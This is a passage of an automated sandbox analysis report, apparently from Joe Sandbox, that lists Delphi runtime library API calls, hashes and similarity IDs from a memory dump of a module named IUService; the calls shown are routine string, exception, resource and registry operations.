                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2913030950-0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308CE
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308E2
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030933), ref: 500308FF
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030933), ref: 5003090E
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030933), ref: 50030913
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2913030950-0
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 5000264B
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 50002661
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 5000268F
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 500026A5
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120 ref: 50010538
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120 ref: 50010553
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5001054E
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120 ref: 5001055A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 50010570
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120 ref: 50010575
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Character@$RaiseString$Except$qqrvException@$bctr$qqrp20Surrogate$qqrbSysutils@$AfterClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucHighList$qqrvLoadMetaObjectString$qqrp20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2248103522-0
                                                                                                                                            • Opcode ID: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                                                            • Instruction ID: d6cb0d2706df4e8aacf07fe5ab19d242fe700b88596e7abf658fbf432eafdb11
                                                                                                                                            • Opcode Fuzzy Hash: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                                                            • Instruction Fuzzy Hash: F5F0EC312014D107F7149BE8FD966A527E2DF542847008227FCC4C7313C55DCC459790
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free$qqrvObject@System@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1799115918-0
                                                                                                                                            • Opcode ID: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                                                            • Instruction ID: 768d9f2a40722debd25e9cdb4e8e1545f006035ae00f2926f4075c138192a15b
                                                                                                                                            • Opcode Fuzzy Hash: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                                                            • Instruction Fuzzy Hash: F7F0B2B46059444FF714DBBBAC9147576F7EFE8360385C519D0548B125DF36D441DB40
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(?), ref: 500239DB
                                                                                                                                            • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 500239F5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$CharChar$qqrpxbLength$qqrpxbNext
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4247032953-2852464175
                                                                                                                                            • Opcode ID: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                                                            • Instruction ID: e4e35325c6f34d9b65b87c66d780d8f477e977d8e87dd0103a07f57f46b7daee
                                                                                                                                            • Opcode Fuzzy Hash: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                                                            • Instruction Fuzzy Hash: 0731A53091658A8BDB10DFA8E8557EEB7F4EF05310F144226E844A76A2D3749E84C7A6
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 500069D6
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A09
                                                                                                                                            • RegCloseKey.ADVAPI32(?,50006A2C,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                            • Opcode ID: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                                                            • Instruction ID: 68fb37e24ddefeba98026e83a54610ce6f8a69bb8d0a75ef775160f2897bda80
                                                                                                                                            • Opcode Fuzzy Hash: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                                                            • Instruction Fuzzy Hash: 5A01F579A50248BAF710DBE19C62FF977ECEB09720F504666FA04E3580E6349900CA55
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500117F5
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011807
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50011849
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                                                            • String ID: A$Z
                                                                                                                                            • API String ID: 2801340237-4098844585
                                                                                                                                            • Opcode ID: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                                                            • Instruction ID: 8de0f1dd0d009ed91e586fc1ea9b6193379de2375c44f7f3be455893678d8cca
                                                                                                                                            • Opcode Fuzzy Hash: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                                                            • Instruction Fuzzy Hash: 5701D651B181910BE71C5A619C513E833D26794302B5C827EE856CB6E3DF38C5D5E220
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010A59
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010A6B
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010AAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                                                            • String ID: a$z
                                                                                                                                            • API String ID: 2801340237-4151050625
                                                                                                                                            • Opcode ID: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                                                            • Instruction ID: 7fc53a10070eca12ef29afc55d4c6d512350c562e79b40b59943fefc8229aada
                                                                                                                                            • Opcode Fuzzy Hash: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                                                            • Instruction Fuzzy Hash: 3401F951B142D04BE7184B71AC512E937D2AB80302BC9417EF4C3CB697DBBD85D5E721
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                                                            • @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                                                            Strings
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrx20StringSystem@System@@Unicode$AnsiPos$qqrpbt1Sysutils@
                                                                                                                                            • String ID: XlP$tlP
                                                                                                                                            • API String ID: 1532255607-7086264
                                                                                                                                            • Opcode ID: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                                                            • Instruction ID: 41cbf7802f78e1180780a1aded232e557ab5269dbb48a6fdf072be4a9a689297
                                                                                                                                            • Opcode Fuzzy Hash: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                                                            • Instruction Fuzzy Hash: ABF0A7A27161D69BE7509B68FC80B6E77E8DB55264F510A36EA88C7201DA35DC00C751
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A30F
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$Asg$qqrr20Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringString$qqriStringiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2014283384-0
                                                                                                                                            • Opcode ID: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                                                            • Instruction ID: 3378d5cb028a156183957ae48023e964bc14677264a5555a71f0aa01a3d2e280
                                                                                                                                            • Opcode Fuzzy Hash: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                                                            • Instruction Fuzzy Hash: 7921C1317061A28FF714EE18E570A5EB3E5EBD2300FA1873AE945C7111EB22ED418751
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 500279F6
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A2F
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A79
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027ABC), ref: 50027A96
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50027AC3), ref: 50027AB6
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromInternalStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharClr$qqrpvIndex$qqrx27NextRef$qqrpvSysutils@T$us$i0$%i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3584664094-0
                                                                                                                                            • Opcode ID: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                                                            • Instruction ID: 5ba0f4aa9d540899a6946def5b7f71f7a7c44f4c34a077cce08fafb771b80344
                                                                                                                                            • Opcode Fuzzy Hash: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                                                            • Instruction Fuzzy Hash: 8921C430A06186EFEB11DFA4EA51ABDB7F5EBC4220F6002B5D448E7251D770AF41DB92
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromSystem@System@@Unicode$AnsiCharLen$qqrr20Str$qqrr20StringStringx27System@%T$us$i0$%$InternalStringpbiStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1942119235-0
                                                                                                                                            • Opcode ID: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                                                            • Instruction ID: ad8f59b466486c7b54756af4fb6304d0c882565156628c1f2bc0eb5e63542440
                                                                                                                                            • Opcode Fuzzy Hash: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                                                            • Instruction Fuzzy Hash: 772108347025A4DFFB11DE64D9A55ADB3E5EBD6210BE04375E800C7305DBB4DE01D691
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B18
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B52
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B71
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiFromInternalStr$qqrr20StringStringx27System@%System@@T$us$i0$%$CharIndex$qqrx20NextStringiSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 112165042-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50027182), ref: 50027108
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50027182), ref: 50027136
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50027182), ref: 50027145
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(00000000,50027182), ref: 50027154
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • API ID: System@$Exception@$bctr$qqrx20StringSysutils@Unicode$ClassClass$qqrp14LoadMetaObjectp17RecxiString$qqrp20Stringpx14System@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3708808660-0
                                                                                                                                            APIs
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?,?,?,50005AE5), ref: 50005A13
                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000), ref: 50005A88
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 50005AA8
                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 50005ABC
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(000000F5), ref: 50005AC1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • API ID: Res$qqriSystem@$CreateErrorFileHandleLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2961129769-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028538
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 5002856B
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028586
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteStringiSysutils@Type$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2787194164-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015AB9), ref: 50015A64
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
